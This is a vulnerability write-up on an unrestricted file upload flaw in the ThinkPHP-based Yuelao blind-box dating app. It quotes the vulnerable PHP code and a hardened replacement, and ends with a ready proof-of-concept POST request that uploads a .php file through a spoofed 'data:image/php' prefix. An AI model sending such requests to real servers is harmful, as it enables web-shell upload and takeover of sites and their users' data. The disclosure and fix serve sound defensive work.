月老情侣交友盲盒系统 (the "Yuelao Couples Dating Blind-Box System") is a blind-box dating application built on ThinkPHP. Version 4.0 mainly reworked its anti-blocking and anti-flagging measures and added a lot of features. Compared with the blind-box source code shared earlier, this one adds tacit-match, same-city match, random match and zodiac match modes, and the UI design is very professional and good-looking as well!
Framework: ThinkPHP V5.1.41 Debug: True
The vulnerability is in the upload method of the /app/controller/Upload.php controller. It reads Base64-encoded files through input('data/a') and hands each one to the base64Image method; the code is as follows.
    public function upload(){
        $data = input('data/a');
        $path = [];
        foreach ($data as $v){
            $res = base64Image($v,"uploads/".date("Y-m-d")."/");
            if ($res['code']) {
                $path[] = $res['file'];
            }
        }
        foreach ($path as $index => $item) {
            $path[$index] = substr($item,strpos($item,'attachment'));
        }
        echo json_encode(['code'=>1,'data'=>$path]);
    }
Tracing into the shared function file /common.php (its functions can be called from any controller): base64Image takes the file type straight from the client-supplied "data:image/<type>;base64," prefix, where \w+ happily matches "php", uses that type as the file extension, and writes the decoded Base64 content with file_put_contents directly into the /uploads/img/ folder (the default path; the upload controller passes uploads/<date>/) with no filtering at all. That is what produces the vulnerability.
    function base64Image($image,$filepath='uploads/img/'){
        $imgBase64 = $image;
        if (preg_match('/^(data:\s*image\/(\w+);base64,)/',$imgBase64,$res)) {
            //get the image type
            $type = $res[2];
            //image save path
            $new_file = $filepath;
            if (!file_exists($new_file)) {
                mkdir($new_file,0755,true);
            }
            //image file name
            $new_file = $new_file.time().substr(microtime(),-5).rand(000,999).'.'.$type;
            if (file_put_contents($new_file,base64_decode(str_replace($res[1],'', $imgBase64)))) {
                $msg['code'] = true;
                $msg['file'] = $new_file;
                $msg['msg'] = 'ok';
            } else {
                $msg['code'] = false;
                $msg['msg'] = 'no';
            }
            return $msg;
        }
    }
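For comparison, here is a hardened replacement for base64Image. This is an added example written for this write-up, not the vendor's code or patch; it assumes the same call site (an array from input('data/a')) and the same ['code','file','msg'] return shape, and the 2 MiB size cap is an assumed value. The key change is that the extension is never taken from the client's "data:image/<type>" prefix: the decoded bytes are inspected with getimagesizefromstring and only whitelisted MIME types are written, under a random name.

```php
<?php
// Hardened replacement for base64Image(): added example, not the vendor's patch.
// Assumed: same call site and return shape as the original; 2 MiB limit is an assumption.
function base64ImageSafe(string $image, string $filepath = 'uploads/img/'): array
{
    // Whitelist: the extension comes from the verified MIME type of the decoded
    // bytes, never from the client-controlled "data:image/<type>" prefix.
    $allowed = [
        'image/png'  => 'png',
        'image/jpeg' => 'jpg',
        'image/gif'  => 'gif',
        'image/webp' => 'webp',
    ];

    // The prefix is still required, but only to locate the payload.
    if (!preg_match('/^data:image\/([a-z0-9]+);base64,/i', $image, $m)) {
        return ['code' => false, 'msg' => 'not a data URI'];
    }

    // Strict decoding rejects anything that is not valid base64.
    $bytes = base64_decode(substr($image, strlen($m[0])), true);
    if ($bytes === false || $bytes === '') {
        return ['code' => false, 'msg' => 'bad base64'];
    }

    // Size cap before any further parsing (assumed limit).
    if (strlen($bytes) > 2 * 1024 * 1024) {
        return ['code' => false, 'msg' => 'too large'];
    }

    // Determine the real type from the content. "data:image/php;base64,..."
    // carrying PHP source fails here because it is not a parseable image.
    $info = @getimagesizefromstring($bytes);
    if ($info === false || !isset($allowed[$info['mime']])) {
        return ['code' => false, 'msg' => 'not an allowed image'];
    }
    $ext = $allowed[$info['mime']];

    // Make sure the target directory exists.
    $dir = rtrim($filepath, '/') . '/';
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        return ['code' => false, 'msg' => 'cannot create dir'];
    }

    // Unguessable filename instead of time() + rand().
    $target = $dir . bin2hex(random_bytes(16)) . '.' . $ext;

    if (file_put_contents($target, $bytes, LOCK_EX) === false) {
        return ['code' => false, 'msg' => 'write failed'];
    }
    return ['code' => true, 'file' => $target, 'msg' => 'ok'];
}
```

Two defence-in-depth steps belong next to this fix: re-encode accepted images through GD (imagecreatefromstring followed by imagepng or imagejpeg) so a valid image with script code appended is rewritten without it, and configure the web server to refuse to execute scripts under the uploads directory at all, so that even a future upload bug cannot turn into code execution.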
Simply POST the data parameter with the Base64-encoded content. To convert any file to Base64 online, click here: https://www.shuzixingkong.net/tool/file-to-base64
POST /app/upload/upload HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Cookie: admin_token=6169XyCZ4aFgkoAJYWPrmlH5uKLQOLMi8CwWeC%2FK; PHPSESSID=8d8cmkasea6mfej4t2b1a27blf
Host: 127.0.0.1:81
Origin: http://127.0.0.1:81
Referer: http://127.0.0.1:81/app/upload/upload
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
data=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==